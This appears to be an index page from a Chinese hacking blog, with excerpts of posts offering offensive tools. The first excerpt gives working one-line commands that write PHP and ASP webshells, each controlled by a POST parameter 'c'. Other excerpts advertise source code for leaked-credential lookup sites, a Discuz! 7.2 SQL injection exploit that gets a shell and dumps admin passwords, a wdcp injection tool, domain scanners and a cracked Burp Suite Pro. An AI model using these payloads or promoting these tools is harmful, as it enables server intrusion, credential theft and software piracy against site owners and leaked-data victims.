cmd生成webshell语句

linux:echo -e "<?@include(\$_POST["c"]);?>" > webshell.cc.php 会再同目录下生成webshell.cc.php一句话 密码:c win:      echo ^<%eval request("c")%^> >>webshell.cc.asp                   会再同目录下生成we...

- 阅读全文 -

社工库源码搜集

我接触的第一个社工库源码是Bamaba的源码 一个Asp+Sqlserver的源码 很简陋 大概就是这个界面 13年前后的大多数社工库都是这个源码改的 包括第一代QQ群查询 asp+sqlserver 单表查询 下载地址:bamaba 变形修改版:Q群登陆查询源码(当时毛都不会写,看到bamaba源码狂改而成)   CNSEU的源码 原来叫97bug吧 怀念一下 好多裤子 嘻嘻 &nbs...

- 阅读全文 -

Discuz! 7.2 SQL注入exp getshell版

参数: 1.可直接getshell 2.爆管理账号密码 3.爆表前缀 如果表前缀不是默认的cdb_ 只需更改代码中的 $table即可,方便快捷。       下载地址:DZ7.2  

- 阅读全文 -

K8大牛的C段旁注查询工具 V1.6

全部复制作者BLOG的懒得写了~ ------------------------------------------------------------------------------------------------------------------------------------------- 工具: K8_C段旁注查询工具 V1.6_20140618编译: VS2012  C#...

- 阅读全文 -

子域名检测大师(自由博客)专版

子域名检测大师(自由博客)专版是(通过模拟人工手动操作,实现自扫描,挂机都可以)同时是广大站长、“灰客”、SEOer,们值得收藏的高效子域名扫描爆破检测工具。 扫描模式支持:服务器接口扫描、暴力检测、同服务器下检测、跨服务器检测、线程(200~3000)子域名自定义过滤 软件界面功能:中途停止、重复域名去除、ID显示、域名显示、域名IP显示、CDN显示、WEB服务器显示、网络状态显示、来源显示 软...

- 阅读全文 -

wdcp虚拟主机管理系统注入利用工具

wdcp (WDlinux Control Panel) 是一套用PHP开发的Linux服务器管理系统,类似国外流行的cpanel,旨在易于使用和管理Linux服务器,可以在线通过网页管理服务器和虚拟主机.简单,方便,易操作.只有Linux版本,没有windows版本,让你方便地使用和管理Linux服务器,让不懂Linux的人也可以用Linux做服务器了.支持CentOS/RedHat/ubunt...

- 阅读全文 -

burpsuite_pro_v1.5.11 破解版

Burp Suite是一个Web应用程序集成攻击平台,它包含了一系列burp工具,这些工具之间有大量接口可以互相通信,这样设计的目的是为了促进和提高整个攻击的效率。平台中所有工具共享同一robust框架,以便统一处理HTTP请求,持久性,认证,上游代理,日志记录,报警和可扩展性。  BurpSuite允许攻击者结合手工和自动技术去枚举、分析、攻击Web应用程序。这些不同的burp工具通过协同工作,...

- 阅读全文 -